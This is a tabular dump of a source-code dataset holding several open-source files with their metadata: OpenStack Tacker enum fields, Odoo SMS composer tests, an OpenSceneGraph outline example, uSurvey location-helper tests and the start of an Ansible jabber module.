repo_name
stringlengths 5
100
| path
stringlengths 4
299
| copies
stringclasses 990
values | size
stringlengths 4
7
| content
stringlengths 666
1.03M
| license
stringclasses 15
values | hash
int64 -9,223,351,895,964,839,000
9,223,297,778B
| line_mean
float64 3.17
100
| line_max
int64 7
1k
| alpha_frac
float64 0.25
0.98
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
openstack/tacker | tacker/objects/fields.py | 1 | 6558 | # Copyright 2018 NTT Data.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
from oslo_versionedobjects import fields
# Import fields from oslo.versionedobjects
StringField = fields.StringField
ListOfObjectsField = fields.ListOfObjectsField
ListOfStringsField = fields.ListOfStringsField
DictOfStringsField = fields.DictOfStringsField
DictOfNullableStringsField = fields.DictOfNullableStringsField
DateTimeField = fields.DateTimeField
BooleanField = fields.BooleanField
BaseEnumField = fields.BaseEnumField
Enum = fields.Enum
ObjectField = fields.ObjectField
IntegerField = fields.IntegerField
FieldType = fields.FieldType
class BaseTackerEnum(Enum):
def __init__(self):
super(BaseTackerEnum, self).__init__(valid_values=self.__class__.ALL)
class ContainerFormat(BaseTackerEnum):
AKI = 'AKI'
AMI = 'AMI'
ARI = 'ARI'
BARE = 'BARE'
DOCKER = 'DOCKER'
OVA = 'OVA'
OVF = 'OVF'
ALL = (AKI, AMI, ARI, BARE, DOCKER, OVA, OVF)
class ContainerFormatFields(BaseEnumField):
AUTO_TYPE = ContainerFormat()
class DiskFormat(BaseTackerEnum):
AKI = 'AKI'
AMI = 'AMI'
ARI = 'ARI'
ISO = 'ISO'
QCOW2 = 'QCOW2'
RAW = 'RAW'
VDI = 'VDI'
VHD = 'VHD'
VHDX = 'VHDX'
VMDK = 'VMDK'
ALL = (AKI, AMI, ARI, ISO, QCOW2, RAW, VDI, VHD, VHDX, VMDK)
class DiskFormatFields(BaseEnumField):
AUTO_TYPE = DiskFormat()
class PackageOnboardingStateType(BaseTackerEnum):
CREATED = 'CREATED'
UPLOADING = 'UPLOADING'
PROCESSING = 'PROCESSING'
ONBOARDED = 'ONBOARDED'
ALL = (CREATED, UPLOADING, PROCESSING, ONBOARDED)
class PackageOnboardingStateTypeField(BaseEnumField):
AUTO_TYPE = PackageOnboardingStateType()
class PackageOperationalStateType(BaseTackerEnum):
ENABLED = 'ENABLED'
DISABLED = 'DISABLED'
ALL = (ENABLED, DISABLED)
class PackageOperationalStateTypeField(BaseEnumField):
AUTO_TYPE = PackageOperationalStateType()
class PackageUsageStateType(BaseTackerEnum):
IN_USE = 'IN_USE'
NOT_IN_USE = 'NOT_IN_USE'
ALL = (IN_USE, NOT_IN_USE)
class PackageUsageStateTypeField(BaseEnumField):
AUTO_TYPE = PackageUsageStateType()
class DictOfNullableField(fields.AutoTypedField):
AUTO_TYPE = fields.Dict(fields.FieldType(), nullable=True)
class UUID(fields.UUID):
def coerce(self, obj, attr, value):
uuid.UUID(str(value))
return str(value)
class UUIDField(fields.AutoTypedField):
AUTO_TYPE = UUID()
class VnfInstanceState(BaseTackerEnum):
INSTANTIATED = 'INSTANTIATED'
NOT_INSTANTIATED = 'NOT_INSTANTIATED'
ALL = (INSTANTIATED, NOT_INSTANTIATED)
class VnfInstanceStateField(BaseEnumField):
AUTO_TYPE = VnfInstanceState()
class VnfInstanceTaskState(BaseTackerEnum):
INSTANTIATING = 'INSTANTIATING'
HEALING = 'HEALING'
TERMINATING = 'TERMINATING'
SCALING = 'SCALING'
ERROR = 'ERROR'
ALL = (INSTANTIATING, HEALING, TERMINATING, SCALING, ERROR)
class VnfInstanceTaskStateField(BaseEnumField):
AUTO_TYPE = VnfInstanceTaskState()
class VnfOperationalStateType(BaseTackerEnum):
STARTED = 'STARTED'
STOPPED = 'STOPPED'
ALL = (STARTED, STOPPED)
class VnfOperationalStateTypeField(BaseEnumField):
AUTO_TYPE = VnfOperationalStateType()
class IpAddressType(BaseTackerEnum):
IPV4 = 'IPV4'
IPV6 = 'IPV6'
ALL = (IPV4, IPV6)
class IpAddressTypeField(BaseEnumField):
AUTO_TYPE = IpAddressType()
class VnfInstanceTerminationType(BaseTackerEnum):
FORCEFUL = 'FORCEFUL'
GRACEFUL = 'GRACEFUL'
ALL = (FORCEFUL, GRACEFUL)
class VnfInstanceTerminationTypeField(BaseEnumField):
AUTO_TYPE = VnfInstanceTerminationType()
class VnfcState(BaseTackerEnum):
STARTED = 'STARTED'
STOPPED = 'STOPPED'
ALL = (STARTED, STOPPED)
class InstanceOperationalState(BaseTackerEnum):
STARTING = 'STARTING'
PROCESSING = 'PROCESSING'
COMPLETED = 'COMPLETED'
FAILED_TEMP = 'FAILED_TEMP'
ROLLING_BACK = 'ROLLING_BACK'
ROLLED_BACK = 'ROLLED_BACK'
ALL = (STARTING, PROCESSING, COMPLETED, FAILED_TEMP,
ROLLING_BACK, ROLLED_BACK)
class InstanceOperationalStateField(BaseEnumField):
AUTO_TYPE = InstanceOperationalState()
class InstanceOperation(BaseTackerEnum):
INSTANTIATE = 'INSTANTIATE'
SCALE = 'SCALE'
TERMINATE = 'TERMINATE'
HEAL = 'HEAL'
MODIFY_INFO = 'MODIFY_INFO'
ALL = (INSTANTIATE, SCALE,
TERMINATE, HEAL, MODIFY_INFO)
class InstanceOperationField(BaseEnumField):
AUTO_TYPE = InstanceOperation()
class LcmOccsOperationState(BaseTackerEnum):
STARTING = 'STARTING'
PROCESSING = 'PROCESSING'
COMPLETED = 'COMPLETED'
FAILED_TEMP = 'FAILED_TEMP'
FAILED = 'FAILED'
ALL = (STARTING, PROCESSING, COMPLETED, FAILED_TEMP, FAILED)
class LcmOccsOperationType(BaseTackerEnum):
INSTANTIATE = 'INSTANTIATE'
TERMINATE = 'TERMINATE'
HEAL = 'HEAL'
SCALE = 'SCALE'
CHANGE_EXT_CONN = 'CHANGE_EXT_CONN'
ALL = (INSTANTIATE, TERMINATE, HEAL, SCALE, CHANGE_EXT_CONN)
class LcmOccsNotificationStatus(BaseTackerEnum):
START = 'START'
RESULT = 'RESULT'
ALL = (START, RESULT)
class ResourceChangeType(BaseTackerEnum):
ADDED = 'ADDED'
REMOVED = 'REMOVED'
MODIFIED = 'MODIFIED'
TEMPORARY = 'TEMPORARY'
ALL = (ADDED, REMOVED, MODIFIED, TEMPORARY)
class LcmOccsNotificationType(BaseTackerEnum):
VNF_OP_OCC_NOTIFICATION = 'VnfLcmOperationOccurrenceNotification'
VNF_ID_CREATION_NOTIFICATION = 'VnfIdentifierCreationNotification'
ALL = (VNF_OP_OCC_NOTIFICATION)
class VnfStatus(BaseTackerEnum):
ACTIVE = 'ACTIVE'
INACTIVE = 'INACTIVE'
ALL = (ACTIVE, INACTIVE)
class InstanceOperation(BaseTackerEnum):
MODIFY_INFO = 'MODIFY_INFO'
class ErrorPoint(BaseTackerEnum):
INITIAL = 0
NOTIFY_PROCESSING = 1
VNF_CONFIG_START = 2
PRE_VIM_CONTROL = 3
POST_VIM_CONTROL = 4
INTERNAL_PROCESSING = 5
VNF_CONFIG_END = 6
NOTIFY_COMPLETED = 7
| apache-2.0 | -3,187,668,274,477,417,500 | 22.173145 | 78 | 0.707228 | false |
gurneyalex/odoo | addons/test_mail_full/tests/test_sms_composer.py | 5 | 20746 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo.addons.sms.tests import common as sms_common
from odoo.addons.test_mail_full.tests import common as test_mail_full_common
class TestSMSComposerComment(test_mail_full_common.BaseFunctionalTest, sms_common.MockSMS, test_mail_full_common.TestRecipients):
""" TODO LIST
* add test for default_res_model / default_res_id and stuff like that;
* add test for comment put in queue;
* add test for language support (set template lang context);
* add test for sanitized / wrong numbers;
"""
@classmethod
def setUpClass(cls):
super(TestSMSComposerComment, cls).setUpClass()
cls._test_body = 'VOID CONTENT'
cls.test_record = cls.env['mail.test.sms'].with_context(**cls._test_context).create({
'name': 'Test',
'customer_id': cls.partner_1.id,
'mobile_nbr': cls.test_numbers[0],
'phone_nbr': cls.test_numbers[1],
})
cls.test_record = cls._reset_mail_context(cls.test_record)
cls.sms_template = cls.env['sms.template'].create({
'name': 'Test Template',
'model_id': cls.env['ir.model']._get('mail.test.sms').id,
'body': 'Dear ${object.display_name} this is an SMS.',
})
def test_composer_comment_not_mail_thread(self):
with self.sudo('employee'):
record = self.env['test_performance.base'].create({'name': 'TestBase'})
composer = self.env['sms.composer'].with_context(
active_model='test_performance.base', active_id=record.id
).create({
'body': self._test_body,
'numbers': ','.join(self.random_numbers),
})
with self.mockSMSGateway():
composer._action_send_sms()
self.assertSMSSent(self.random_numbers_san, self._test_body)
def test_composer_comment_default(self):
with self.sudo('employee'):
composer = self.env['sms.composer'].with_context(
active_model='mail.test.sms', active_id=self.test_record.id
).create({
'body': self._test_body,
})
with self.mockSMSGateway():
messages = composer._action_send_sms()
self.assertSMSNotification([{'partner': self.test_record.customer_id, 'number': self.test_numbers_san[1]}], self._test_body, messages)
def test_composer_comment_field_1(self):
with self.sudo('employee'):
composer = self.env['sms.composer'].with_context(
active_model='mail.test.sms', active_id=self.test_record.id,
).create({
'body': self._test_body,
'number_field_name': 'mobile_nbr',
})
with self.mockSMSGateway():
messages = composer._action_send_sms()
self.assertSMSNotification([{'partner': self.test_record.customer_id, 'number': self.test_numbers_san[0]}], self._test_body, messages)
def test_composer_comment_field_2(self):
with self.sudo('employee'):
composer = self.env['sms.composer'].with_context(
active_model='mail.test.sms', active_id=self.test_record.id,
).create({
'body': self._test_body,
'number_field_name': 'phone_nbr',
})
with self.mockSMSGateway():
messages = composer._action_send_sms()
self.assertSMSNotification([{'partner': self.test_record.customer_id, 'number': self.test_numbers_san[1]}], self._test_body, messages)
def test_composer_comment_field_w_numbers(self):
with self.sudo('employee'):
composer = self.env['sms.composer'].with_context(
active_model='mail.test.sms', active_id=self.test_record.id,
default_number_field_name='mobile_nbr',
).create({
'body': self._test_body,
'numbers': ','.join(self.random_numbers),
})
with self.mockSMSGateway():
messages = composer._action_send_sms()
self.assertSMSNotification([
{'partner': self.test_record.customer_id, 'number': self.test_record.mobile_nbr},
{'number': self.random_numbers_san[0]}, {'number': self.random_numbers_san[1]}], self._test_body, messages)
def test_composer_comment_field_w_template(self):
with self.sudo('employee'):
composer = self.env['sms.composer'].with_context(
active_model='mail.test.sms', active_id=self.test_record.id,
default_template_id=self.sms_template.id,
default_number_field_name='mobile_nbr',
).create({})
with self.mockSMSGateway():
messages = composer._action_send_sms()
self.assertSMSNotification([{'partner': self.test_record.customer_id, 'number': self.test_record.mobile_nbr}], 'Dear %s this is an SMS.' % self.test_record.display_name, messages)
def test_composer_numbers_no_model(self):
with self.sudo('employee'):
composer = self.env['sms.composer'].with_context(
default_composition_mode='numbers'
).create({
'body': self._test_body,
'numbers': ','.join(self.random_numbers),
})
with self.mockSMSGateway():
composer._action_send_sms()
self.assertSMSSent(self.random_numbers_san, self._test_body)
class TestSMSComposerBatch(test_mail_full_common.BaseFunctionalTest, sms_common.MockSMS):
@classmethod
def setUpClass(cls):
super(TestSMSComposerBatch, cls).setUpClass()
cls._test_body = 'Zizisse an SMS.'
cls._create_records_for_batch('mail.test.sms', 3)
cls.sms_template = cls._create_sms_template('mail.test.sms')
def test_composer_batch_active_domain(self):
with self.sudo('employee'):
composer = self.env['sms.composer'].with_context(
default_composition_mode='comment',
default_res_model='mail.test.sms',
default_use_active_domain=True,
active_domain=[('id', 'in', self.records.ids)],
).create({
'body': self._test_body,
})
with self.mockSMSGateway():
messages = composer._action_send_sms()
for record in self.records:
self.assertSMSNotification([{'partner': r.customer_id} for r in self.records], 'Zizisse an SMS.', messages)
def test_composer_batch_active_ids(self):
with self.sudo('employee'):
composer = self.env['sms.composer'].with_context(
default_composition_mode='comment',
default_res_model='mail.test.sms',
active_ids=self.records.ids
).create({
'body': self._test_body,
})
with self.mockSMSGateway():
messages = composer._action_send_sms()
for record in self.records:
self.assertSMSNotification([{'partner': r.customer_id} for r in self.records], 'Zizisse an SMS.', messages)
def test_composer_batch_domain(self):
with self.sudo('employee'):
composer = self.env['sms.composer'].with_context(
default_composition_mode='comment',
default_res_model='mail.test.sms',
default_use_active_domain=True,
default_active_domain=repr([('id', 'in', self.records.ids)]),
).create({
'body': self._test_body,
})
with self.mockSMSGateway():
messages = composer._action_send_sms()
for record in self.records:
self.assertSMSNotification([{'partner': r.customer_id} for r in self.records], 'Zizisse an SMS.', messages)
def test_composer_batch_res_ids(self):
with self.sudo('employee'):
composer = self.env['sms.composer'].with_context(
default_composition_mode='comment',
default_res_model='mail.test.sms',
default_res_ids=repr(self.records.ids),
).create({
'body': self._test_body,
})
with self.mockSMSGateway():
messages = composer._action_send_sms()
for record in self.records:
self.assertSMSNotification([{'partner': r.customer_id} for r in self.records], 'Zizisse an SMS.', messages)
class TestSMSComposerMass(test_mail_full_common.BaseFunctionalTest, sms_common.MockSMS):
@classmethod
def setUpClass(cls):
super(TestSMSComposerMass, cls).setUpClass()
cls._test_body = 'Zizisse an SMS.'
cls._create_records_for_batch('mail.test.sms', 3)
cls.sms_template = cls._create_sms_template('mail.test.sms')
def test_composer_mass_active_domain(self):
with self.sudo('employee'):
composer = self.env['sms.composer'].with_context(
default_composition_mode='mass',
default_res_model='mail.test.sms',
default_use_active_domain=True,
active_domain=[('id', 'in', self.records.ids)],
).create({
'body': self._test_body,
'mass_keep_log': False,
})
with self.mockSMSGateway():
composer.action_send_sms()
for record in self.records:
self.assertSMSOutgoing(record.customer_id, None, self._test_body)
def test_composer_mass_active_domain_w_template(self):
with self.sudo('employee'):
composer = self.env['sms.composer'].with_context(
default_composition_mode='mass',
default_res_model='mail.test.sms',
default_use_active_domain=True,
active_domain=[('id', 'in', self.records.ids)],
default_template_id=self.sms_template.id,
).create({
'mass_keep_log': False,
})
with self.mockSMSGateway():
composer.action_send_sms()
for record in self.records:
self.assertSMSOutgoing(record.customer_id, None, 'Dear %s this is an SMS.' % record.display_name)
def test_composer_mass_active_ids(self):
with self.sudo('employee'):
composer = self.env['sms.composer'].with_context(
default_composition_mode='mass',
default_res_model='mail.test.sms',
active_ids=self.records.ids,
).create({
'body': self._test_body,
'mass_keep_log': False,
})
with self.mockSMSGateway():
composer.action_send_sms()
for partner in self.partners:
self.assertSMSOutgoing(partner, None, self._test_body)
def test_composer_mass_active_ids_w_blacklist(self):
self.env['phone.blacklist'].create([{
'number': p.phone_sanitized,
'active': True,
} for p in self.partners[:5]])
with self.sudo('employee'):
composer = self.env['sms.composer'].with_context(
default_composition_mode='mass',
default_res_model='mail.test.sms',
active_ids=self.records.ids,
).create({
'body': self._test_body,
'mass_keep_log': False,
'mass_use_blacklist': True,
})
with self.mockSMSGateway():
composer.action_send_sms()
for partner in self.partners[5:]:
self.assertSMSOutgoing(partner, partner.phone_sanitized, content=self._test_body)
for partner in self.partners[:5]:
self.assertSMSCanceled(partner, partner.phone_sanitized, 'sms_blacklist', content=self._test_body)
def test_composer_mass_active_ids_wo_blacklist(self):
self.env['phone.blacklist'].create([{
'number': p.phone_sanitized,
'active': True,
} for p in self.partners[:5]])
with self.sudo('employee'):
composer = self.env['sms.composer'].with_context(
default_composition_mode='mass',
default_res_model='mail.test.sms',
active_ids=self.records.ids,
).create({
'body': self._test_body,
'mass_keep_log': False,
'mass_use_blacklist': False,
})
with self.mockSMSGateway():
composer.action_send_sms()
for partner in self.partners:
self.assertSMSOutgoing(partner, partner.phone_sanitized, content=self._test_body)
def test_composer_mass_active_ids_w_blacklist_and_done(self):
self.env['phone.blacklist'].create([{
'number': p.phone_sanitized,
'active': True,
} for p in self.partners[:5]])
for p in self.partners[8:]:
p.mobile = self.partners[8].mobile
self.assertEqual(p.phone_sanitized, self.partners[8].phone_sanitized)
with self.sudo('employee'):
composer = self.env['sms.composer'].with_context(
default_composition_mode='mass',
default_res_model='mail.test.sms',
active_ids=self.records.ids,
).create({
'body': self._test_body,
'mass_keep_log': False,
'mass_use_blacklist': True,
})
with self.mockSMSGateway():
composer.action_send_sms()
for partner in self.partners[8:]:
self.assertSMSOutgoing(partner, partner.phone_sanitized, content=self._test_body)
for partner in self.partners[5:8]:
self.assertSMSCanceled(partner, partner.phone_sanitized, 'sms_duplicate', content=self._test_body)
for partner in self.partners[:5]:
self.assertSMSCanceled(partner, partner.phone_sanitized, 'sms_blacklist', content=self._test_body)
def test_composer_mass_active_ids_w_template(self):
with self.sudo('employee'):
composer = self.env['sms.composer'].with_context(
default_composition_mode='mass',
default_res_model='mail.test.sms',
active_ids=self.records.ids,
default_template_id=self.sms_template.id,
).create({
'mass_keep_log': False,
})
with self.mockSMSGateway():
composer.action_send_sms()
for record in self.records:
self.assertSMSOutgoing(record.customer_id, None, 'Dear %s this is an SMS.' % record.display_name)
def test_composer_mass_active_ids_w_template_and_lang(self):
self.env.ref('base.lang_fr').write({'active': True})
self.env['ir.translation'].create({
'type': 'model',
'name': 'sms.template,body',
'lang': 'fr_FR',
'res_id': self.sms_template.id,
'src': self.sms_template.body,
'value': 'Cher·e· ${object.display_name} ceci est un SMS.',
})
# set template to try to use customer lang
self.sms_template.write({
'lang': '${object.customer_id.lang}',
})
# set one customer as french speaking
self.partners[2].write({'lang': 'fr_FR'})
with self.sudo('employee'):
composer = self.env['sms.composer'].with_context(
default_composition_mode='mass',
default_res_model='mail.test.sms',
active_ids=self.records.ids,
default_template_id=self.sms_template.id,
).create({
'mass_keep_log': False,
})
with self.mockSMSGateway():
composer.action_send_sms()
for record in self.records:
if record.customer_id == self.partners[2]:
self.assertSMSOutgoing(record.customer_id, None, 'Cher·e· %s ceci est un SMS.' % record.display_name)
else:
self.assertSMSOutgoing(record.customer_id, None, 'Dear %s this is an SMS.' % record.display_name)
def test_composer_mass_active_ids_w_template_and_log(self):
with self.sudo('employee'):
composer = self.env['sms.composer'].with_context(
default_composition_mode='mass',
default_res_model='mail.test.sms',
active_ids=self.records.ids,
default_template_id=self.sms_template.id,
).create({
'mass_keep_log': True,
})
with self.mockSMSGateway():
composer.action_send_sms()
for record in self.records:
self.assertSMSOutgoing(record.customer_id, None, 'Dear %s this is an SMS.' % record.display_name)
self.assertSMSLogged(record, 'Dear %s this is an SMS.' % record.display_name)
def test_composer_template_context_action(self):
""" Test the context action from a SMS template (Add context action button)
and the usage with the sms composer """
# Create the lang info
self.env.ref('base.lang_fr').write({'active': True})
self.env['ir.translation'].create({
'type': 'model',
'name': 'sms.template,body',
'lang': 'fr_FR',
'res_id': self.sms_template.id,
'src': self.sms_template.body,
'value': "Hello ${object.display_name} ceci est en français.",
})
# set template to try to use customer lang
self.sms_template.write({
'lang': '${object.customer_id.lang}',
})
# create a second record linked to a customer in another language
self.partners[2].write({'lang': 'fr_FR'})
test_record_2 = self.env['mail.test.sms'].create({
'name': 'Test',
'customer_id': self.partners[2].id,
})
test_record_1 = self.env['mail.test.sms'].create({
'name': 'Test',
'customer_id': self.partners[1].id,
})
# Composer creation with context from a template context action (simulate) - comment (single recipient)
with self.sudo('employee'):
composer = self.env['sms.composer'].with_context(
default_composition_mode='guess',
default_res_ids=[test_record_2.id],
default_res_id=test_record_2.id,
active_ids=[test_record_2.id],
active_id=test_record_2.id,
active_model='mail.test.sms',
default_template_id=self.sms_template.id,
).create({
'mass_keep_log': False,
})
# Call manually the onchange
composer._onchange_template_id()
self.assertEquals(composer.composition_mode, "comment")
self.assertEquals(composer.body, "Hello %s ceci est en français." % test_record_2.display_name)
with self.mockSMSGateway():
messages = composer._action_send_sms()
number = self.partners[2].phone_get_sanitized_number()
self.assertSMSNotification([{'partner': test_record_2.customer_id, 'number': number}], "Hello %s ceci est en français." % test_record_2.display_name, messages)
# Composer creation with context from a template context action (simulate) - mass (multiple recipient)
with self.sudo('employee'):
composer = self.env['sms.composer'].with_context(
default_composition_mode='guess',
default_res_ids=[test_record_1.id, test_record_2.id],
default_res_id=test_record_1.id,
active_ids=[test_record_1.id, test_record_2.id],
active_id=test_record_1.id,
active_model='mail.test.sms',
default_template_id=self.sms_template.id,
).create({
'mass_keep_log': True,
})
# Call manually the onchange
composer._onchange_template_id()
self.assertEquals(composer.composition_mode, "mass")
# In english because by default but when sinding depending of record
self.assertEquals(composer.body, "Dear ${object.display_name} this is an SMS.")
with self.mockSMSGateway():
composer.action_send_sms()
self.assertSMSOutgoing(test_record_1.customer_id, None, 'Dear %s this is an SMS.' % test_record_1.display_name)
self.assertSMSOutgoing(test_record_2.customer_id, None, "Hello %s ceci est en français." % test_record_2.display_name)
| agpl-3.0 | -7,740,930,999,319,327,000 | 40.64257 | 187 | 0.566978 | false |
JaneliaSciComp/osgpyplusplus | examples/debugging2/osgoutline.py | 1 | 2980 | #!/bin/env python
# Automatically translated python version of
# OpenSceneGraph example program "osgoutline"
# !!! This program will need manual tuning before it will work. !!!
import sys
from osgpypp import osg
from osgpypp import osgDB
from osgpypp import osgFX
from osgpypp import osgViewer
# Translated from file 'osgoutline.cpp'
# -*-c++-*-
#
# * Draw an outline around a model.
#
#include <osg/Group>
#include <osg/PositionAttitudeTransform>
#include <osgDB/ReadFile>
#include <osgViewer/Viewer>
#include <osgFX/Outline>
def main(argv):
arguments = osg.ArgumentParser(argv)
arguments.getApplicationUsage().setCommandLineUsage(arguments.getApplicationName()+" [options] <file>")
arguments.getApplicationUsage().addCommandLineOption("--testOcclusion","Test occlusion by other objects")
arguments.getApplicationUsage().addCommandLineOption("-h or --help","Display this information")
testOcclusion = False
while arguments.read("--testOcclusion") : testOcclusion = True
# load outlined object
modelFilename = "dumptrick.osgt"
if arguments.argc() > 2:
modelFileName = arguments[2]
outlineModel = osgDB.readNodeFile(modelFilename)
if not outlineModel :
osg.notify(osg.FATAL) << "Unable to load model '" << modelFilename << "'\n"
return -1
# create scene
root = osg.Group()
# create outline effect
outline = osgFX.Outline()
root.addChild(outline)
outline.setWidth(8)
outline.setColor(osg.Vec4(1,1,0,1))
outline.addChild(outlineModel)
if testOcclusion :
# load occluder
occludedModelFilename = "cow.osgt"
occludedModel = osgDB.readNodeFile(occludedModelFilename)
if not occludedModel :
osg.notify(osg.FATAL), "Unable to load model '", occludedModelFilename, "'\n"
return -1
# occluder offset
bsphere = outlineModel.getBound()
occluderOffset = osg.Vec3(0,1,0) * bsphere.radius() * 1.2
# occluder behind outlined model
modelTransform0 = osg.PositionAttitudeTransform()
modelTransform0.setPosition(bsphere.center() + occluderOffset)
modelTransform0.addChild(occludedModel)
root.addChild(modelTransform0)
# occluder in front of outlined model
modelTransform1 = osg.PositionAttitudeTransform()
modelTransform1.setPosition(bsphere.center() - occluderOffset)
modelTransform1.addChild(occludedModel)
root.addChild(modelTransform1)
# must have stencil buffer...
osg.DisplaySettings.instance().setMinimumNumStencilBits(1)
# construct the viewer
viewer = osgViewer.Viewer()
viewer.setSceneData(root)
# must clear stencil buffer...
clearMask = viewer.getCamera().getClearMask()
viewer.getCamera().setClearMask(clearMask | GL_STENCIL_BUFFER_BIT)
viewer.getCamera().setClearStencil(0)
return viewer.run()
if __name__ == "__main__":
main(sys.argv)
| bsd-3-clause | -6,478,428,171,334,861,000 | 27.653846 | 109 | 0.69094 | false |
unicefuganda/uSurvey | survey/tests/utils/test_views_helper.py | 1 | 7986 | from django.test import TestCase
from survey.models.locations import *
from survey.utils.views_helper import contains_key, get_descendants, get_ancestors, clean_query_params, prepend_to_keys
class ViewsHelperTest(TestCase):
def test_contains_key(self):
self.assertTrue(contains_key({'bla': '1'}, 'bla'))
self.assertFalse(contains_key({'haha': '1'}, 'bla'))
self.assertFalse(contains_key({'bla': '-1'}, 'bla'))
self.assertFalse(contains_key({'bla': ''}, 'bla'))
self.assertFalse(contains_key({'bla': 'NOT_A_DIGIT'}, 'bla'))
def test_get_descendants(self):
country = LocationType.objects.create(name='Country', slug='country')
region = LocationType.objects.create(
name='Region', slug='region', parent=country)
city = LocationType.objects.create(
name='City', slug='city', parent=region)
parish = LocationType.objects.create(
name='Parish', slug='parish', parent=city)
village = LocationType.objects.create(
name='Village', slug='village', parent=parish)
subcounty = LocationType.objects.create(
name='Subcounty', slug='subcounty', parent=village)
africa = Location.objects.create(name='Africa', type=country)
uganda = Location.objects.create(
name='Uganda', type=region, parent=africa)
abim = Location.objects.create(name='ABIM', parent=uganda, type=city)
abim_son = Location.objects.create(
name='LABWOR', parent=abim, type=parish)
abim_son_son = Location.objects.create(
name='KALAKALA', parent=abim_son, type=village)
[abim, abim_son, abim_son_son]
self.assertIn(abim, get_descendants(abim))
def test_get_descendants_when_include_self_is_false(self):
country = LocationType.objects.create(name='Country', slug='country')
region = LocationType.objects.create(name='Region', slug='region')
city = LocationType.objects.create(name='City', slug='city')
parish = LocationType.objects.create(name='Parish', slug='parish')
village = LocationType.objects.create(name='Village', slug='village')
subcounty = LocationType.objects.create(
name='Subcounty', slug='subcounty')
africa = Location.objects.create(name='Africa', type=country)
uganda = Location.objects.create(
name='Uganda', type=region, parent=africa)
abim = Location.objects.create(name='ABIM', parent=uganda, type=city)
abim_son = Location.objects.create(
name='LABWOR', parent=abim, type=parish)
abim_son_son = Location.objects.create(
name='KALAKALA', parent=abim_son, type=village)
abim_son_daughter = Location.objects.create(
name='OYARO', parent=abim_son, type=village)
abim_son_daughter_daughter = Location.objects.create(
name='WIAWER', parent=abim_son_daughter, type=subcounty)
abim_son_son_daughter = Location.objects.create(
name='ATUNGA', parent=abim_son_son, type=subcounty)
abim_son_son_son = Location.objects.create(
name='WICERE', parent=abim_son_son, type=subcounty)
expected_location_descendants = [abim_son, abim_son_son, abim_son_daughter, abim_son_son_daughter,
abim_son_son_son, abim_son_daughter_daughter]
descendants = get_descendants(abim, include_self=False)
self.assertNotEqual(expected_location_descendants, get_descendants)
self.assertNotIn(abim, expected_location_descendants, descendants)
def test_get_ancestor(self):
country = LocationType.objects.create(name='Country', slug='country')
region = LocationType.objects.create(name='Region', slug='region')
city = LocationType.objects.create(name='City', slug='city')
parish = LocationType.objects.create(name='Parish', slug='parish')
village = LocationType.objects.create(name='Village', slug='village')
subcounty = LocationType.objects.create(
name='Subcounty', slug='subcounty')
africa = Location.objects.create(name='Africa', type=country)
uganda = Location.objects.create(
name='Uganda', type=region, parent=africa)
abim = Location.objects.create(name='ABIM', parent=uganda, type=city)
abim_son = Location.objects.create(
name='LABWOR', parent=abim, type=parish)
abim_son_son = Location.objects.create(
name='KALAKALA', parent=abim_son, type=village)
abim_son_daughter = Location.objects.create(
name='OYARO', parent=abim_son, type=village)
abim_son_daughter_daughter = Location.objects.create(
name='WIAWER', parent=abim_son_daughter, type=subcounty)
abim_son_son_daughter = Location.objects.create(
name='ATUNGA', parent=abim_son_son, type=subcounty)
abim_son_son_son = Location.objects.create(
name='WICERE', parent=abim_son_son, type=subcounty)
self.assertEqual([], get_ancestors(africa))
self.assertEqual([africa], get_ancestors(uganda))
self.assertEqual([uganda, africa], get_ancestors(abim))
self.assertEqual([abim, uganda, africa], get_ancestors(abim_son))
self.assertEqual([abim_son, abim, uganda, africa],
get_ancestors(abim_son_son))
self.assertEqual([abim_son_son, abim_son, abim, uganda,
africa], get_ancestors(abim_son_son_son))
def test_get_ancestor_including_self(self):
country = LocationType.objects.create(name='Country', slug='country')
region = LocationType.objects.create(name='Region', slug='region')
city = LocationType.objects.create(name='City', slug='city')
parish = LocationType.objects.create(name='Parish', slug='parish')
village = LocationType.objects.create(name='Village', slug='village')
subcounty = LocationType.objects.create(
name='Subcounty', slug='subcounty')
africa = Location.objects.create(name='Africa', type=country)
uganda = Location.objects.create(
name='Uganda', type=region, parent=africa)
abim = Location.objects.create(name='ABIM', parent=uganda, type=city)
abim_son = Location.objects.create(
name='LABWOR', parent=abim, type=parish)
abim_son_son = Location.objects.create(
name='KALAKALA', parent=abim_son, type=village)
abim_son_daughter = Location.objects.create(
name='OYARO', parent=abim_son, type=village)
abim_son_daughter_daughter = Location.objects.create(
name='WIAWER', parent=abim_son_daughter, type=subcounty)
abim_son_son_daughter = Location.objects.create(
name='ATUNGA', parent=abim_son_son, type=subcounty)
abim_son_son_son = Location.objects.create(
name='WICERE', parent=abim_son_son, type=subcounty)
expected_location_ancestors = [
abim_son_son_son, abim_son_son, abim_son, abim, uganda, africa]
ancestors = get_ancestors(abim_son_son_son, include_self=True)
self.assertEqual(expected_location_ancestors, ancestors)
def test_remove_key_value_when_value_is_ALL(self):
params = {'group__id': 'All', 'batch__id': 1,
'module__id': '', 'question__text': 'haha', 'survey': None}
self.assertEqual(
{'batch__id': 1, 'question__text': 'haha'}, clean_query_params(params))
def test_remove_key_value_when_value_is_NONE(self):
params = {'module__id': None, 'group__id': None, 'answer_type': None}
self.assertEqual({}, clean_query_params(params))
def test_append_text_to_all_keys(self):
params = {'batch__id': 1, 'question__text': 'haha', }
self.assertEqual({'group__batch__id': 1, 'group__question__text': 'haha'},
prepend_to_keys(params, 'group__')) | bsd-3-clause | 6,841,801,498,728,483,000 | 55.246479 | 119 | 0.638492 | false |
nwiizo/workspace_2017 | ansible-modules-extras/notification/jabber.py | 32 | 4791 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# (c) 2015, Brian Coca <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
